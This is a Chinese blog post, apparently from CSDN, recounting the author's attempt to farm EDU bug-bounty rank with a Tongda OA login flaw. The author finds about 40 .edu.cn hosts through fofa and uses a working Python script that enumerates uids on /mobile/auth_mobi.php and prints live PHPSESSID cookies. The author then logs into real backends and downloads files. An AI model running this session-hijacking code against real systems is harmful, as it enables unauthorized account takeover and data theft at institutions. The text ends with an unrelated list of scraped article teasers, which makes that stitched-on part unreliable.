全文小结

  • 1.首先洞没刷到肯定不舒服的,但这种就是比消息,谁拿到的消息快,谁刷的早,就有分,晚的就重复。(好几个3号凌晨通宵刷,我的妈)
  • 2. 向这种在线洞,本地复现材料edu不认。好之为之,40个洞一个没过。
  • 3. 3. fofa找到资产挺多的,但不全,起码有3成不在里面。
  • 4. 4.自己审洞吧,没事别折腾,空欢喜一场。。

3/3号一天早上,需要提早上课,懒洋洋来到教室。

刷刷公众号,看到一个眼前一亮的文章: 某OA系统在线登录漏洞,一看时间是刚发的,突然想起我那可怜的edu rank,感觉这个洞有点说法。
想着回到寝室做一波复现后刷一波,。。。。
回到寝室忘记了。。。睡一觉起来记起还有个这玩意

开始复现,通过作者的解释,得知是登录接口的问题

然后滑到下面看到作者提供了poc。

看到作者没有给附件后**,感觉这个poc可能要调试调试**,然后来了一波复制粘贴,复制到本地后,运行出现各种语法错误,内容大至忘记了,比较多的是 if “RELOGIN” 上面图的第22行,寻思着也没出现缩进,为毛报错了。贴到vscode发现前面的title()连静态审查都过不了

后面灵光一闪: 网页格式既然有问题,那我手工粘贴检查不就行了??
先导包,导入上面的def title() 函数,很快啊,就做完了,成功遍历。
当时图大致这样

抓包发现还存在一个key_DATA参数,直接复制PHPSESSID改包会失败,说明服务端对key做了验证,只能用脚本跑是否存在漏洞-访问接口(放回一个key和在线的SESSID),访问./general/后台 就能登录。

很快啊,本地做完复现后,就上fofa开始干,
在资产库找到指纹:app=“TDXK-通达OA”
直接 app=“TDXK-通达OA”&& host=".edu.cn"

看到结果挺多了,随便试试这个接口,

噢? 这tm不就有洞嘛? 果然是0day,在看看别的

看了10来个,发现都存在这个洞,感觉发了。于是乎:构思这种在线洞如何提交漏洞证明:
我的思路是:只要访问接口存在RELOGIN(用户不在线)或者空(用户在线),
提交一份本地复现的证明,应该就能过。

说干就干,很快啊,就刷了30来个

不得不说,fofa的资产是很全。。最后看了下大概有40来个。
算了一下rank可能70-80,这难道就是0day嘛?

第二天回寝室后,打开edu,看到好几个人也在刷,但没看到我。。

有一种不好的预感。。。。
果然,劳资翻车了

我tm楞了一会,点开详情

这tm在线洞需要用户在线才能算洞,我tm直接蛋疼,记得昨天还交了个在线的

重复,还没给过。。。。
这车翻的我找不着头脑??

1.那首页上好几页的洞都是登录的???
2.为毛他们都过了??

在群里翻了消息,看到一个公众号发了篇文章,具体是啥忘了,找到个脚本
说是 那个接口/mobile/auth_mobi.php?isAvatar=1&uid=&P_VER=0 这里的uid表示用户在库里的session。我tm心态直接爆炸,我说他们的在线用户怎么来的。


好吧,在心态炸裂后,想着能不能找几个弥补损失,40个洞,能捡漏个2-3个,还是不亏的。
用他的脚本,这里有个坑,url = sys.argv[1] 这里不能放在IDE运行,摸索一会后 python3 poc1.py http://*.edu.cn 大致这样可以跑,

import requests
from bs4 import BeautifulSoup
import sys
import reurl = sys.argv[1]
for i in range(1,10000):try :vuln_url = url + "/mobile/auth_mobi.php?isAvatar=1&uid="+str(i)+"&P_VER=0"resp = requests.get(vuln_url)soup = BeautifulSoup(resp.text,'html.parser')if 'RELOGIN' in soup.get_text():print("不存在")else:PHPSESSION = re.findall(r'PHPSESSID=(.*?);', str(resp.headers))print('uid='+str(i)+"在线"+"对应的COOKIE值是:PHPSESSID="+str(PHPSESSION[0]))#  breakexcept:break

原代码的意思是找到存在的SESSID就退出,但找了几个洞后,好不容易找到几个在线的,遗憾的是,某哥已经刷过了。。
心想着后台有没啥重要个人信息,交个弱口令也行,所以吧break注释了,这样就会吧全部SESSID在线都跑完。


转了几圈下了几个文件,感觉也没啥利用价值,无奈,放掉这个洞了。。

抱着不甘心的想法,看到edu那几个一块刷的具体,看到好几个刷的比较早,差不多一个人10来个洞,30来rank,没有我想的一把梭情况出现

做个小结:

1.首先洞没刷到肯定不舒服的,但这种就是比消息,谁拿到的消息快,谁刷的早,就有分,晚的就重复。(好几个3号凌晨通宵刷,我的妈)

2. 向这种在线洞,本地复现材料edu不认。好之为之,40个洞一个没过。

3. 3. fofa找到资产挺多的,但不全,起码有3成不在里面。

4. 4.自己审洞吧,没事别折腾,空欢喜一场。。

挖掘厂商SRC-记一次某OA在线登录洞edu不认账相关推荐

  1. 弘玑Cyclone成功入围《2022爱分析·流程挖掘厂商全景报告》,流程智能产品受到广泛关注

    8月25日,国内知名数字化市场研究咨询机构爱分析正式发布<2022爱分析 ·  流程挖掘厂商全景报告>(以下简称"报告").弘玑Cyclone作为超自动化领导者,其自主 ...

  2. ExtJs学习篇---OA系统登录界面设计

    今天在网上看到了一个案例,于是就跟着练习了下,也就当作这几天学习的一个应用吧! 部署图如下: login.js //Ext.BLANK_IMAGE_URL是空白图片的地址 Ext.BLANK_IMAG ...

  3. 基于SSM+SpringBoot+MySQL+Bootstrap的OA在线办公自动化管理系统

    登陆首页 部门管理 职位管理 考勤报表 新建流程 通知管理 邮件管理 任务管理 日程管理 部门 笔记 通讯录 讨论区 技术描述 开发工具: Idea/Eclipse 数据库: mysql Jar包仓库 ...

  4. 系统OA在线演示和下载地址

    系统OA在线演示地址            下载地址 通达oa                http://www.tongda2000.com/download/ 新思创oa             ...

  5. 记一次 ftp 可以正常登录,但是输入ls dir 命令卡死的问题

    记一次 ftp 可以正常登录,但是输入ls dir 命令卡死的问题 最近应客户方在服务器上安装ftp服务.安装配置完成后cmd,FileZilla均可以访问,连浏览都可以用,可是用别的服务器正常登录上 ...

  6. 游戏厂商出海记:韩国内卷严重,其它地区占到什么地盘?

    在游戏圈,韩国是个绕不开的存在,这一方面是由于PUBG等知名韩国游戏的带动作用,另一方面韩国也属于东亚文化圈,国产游戏企业出海时往往将这里作为重要目的地. 9月,一款二次元游戏在韩国的异军突起引发了广 ...

  7. 重生之我是赏金猎人(三)-无脑挖掘某SRC getshell

    0x00 项目背景 该系列旨在分享自己和团队在SRC.项目实战漏洞测试过程中的有趣案例,如果读者能从本项目习得一些有用的知识,那么笔者将非常荣幸. 该系列首发github:https://github ...

  8. oa系统登录后几分钟自动退出_2020版OA办公系统正式上线运行!

    关于2020版OA办公系统 正式上线运行的通知 各学院,校机关各部门.各直属单位: 2020版OA办公系统自10月7日上线试运行以来,广泛听取了学院部门的意见建议,经过功能调整优化,现已具备上线运行条 ...

  9. 泛微OA单点登录帆软报表

    帆软提供很多种单点登录有很多种方式,基于不开发的前提,可以使用URL登录插件的方式,即使用get方式将用户名密码发送给帆软服务器进行身份验证. 泛微端配置: 泛微OA的版本: 8.100.0531,提 ...

最新文章

  1. 线程的介绍(概念、作用)
  2. 请还互联网产业一个朗朗乾坤
  3. hdu 1723 DP/递推
  4. 图解在Windows下使用vim(gvim)
  5. 02-对图像进行边界填充
  6. docker安装配置gitlab详细过程
  7. 如何下载python模块_Python第三方库(模块)下载和安装(使用pip命令)
  8. 深入浅出MFC文档/视图架构之文档模板
  9. vSAN其实很简单-如何处理“vSAN磁盘写满”问题?
  10. Android系统开发之唤醒与功耗
  11. MTRR内存类型范围寄存器
  12. 三菱FX3S,FX3G,FX3U序列PLC控制器编程手册-基本应用指令篇下载
  13. matlab做均值和方差,matlab求均值,方差
  14. 蚂蚁金服刘伟光:我们为什么要科技开放
  15. 有哪些简洁好看且能高效整理信息的便签软件
  16. 一键构建云上高可用蛋白质结构预测平台
  17. 济南软件测试行业提出千亿级市场的战略布局
  18. 百度地图、高德地图、腾讯地图餐饮POI内容结构及获取接口
  19. Java 并发核心机制
  20. 学python的亲身经历_你要偷偷的学Python,然后惊呆所有人

热门文章

  1. android微信消息无提醒,OPPO手机微信消息不提醒怎么办?(附多种解决方法)
  2. 学习NLP的第20天——基于信息熵和互信息的新词提取实现
  3. 餐饮行业移动管理系统—Pad点餐系统
  4. 汽车油封在汽车行业的重要性
  5. AN1078知识点整理
  6. pfw中totalFound有值,result却没有值
  7. android chacha加密,Android P 安全行为变更
  8. Uart串口receive端实现
  9. 数据结构之C语言Dequeue
  10. 【有利可图网】实用!关于PS AI CDR 的格式互转教程!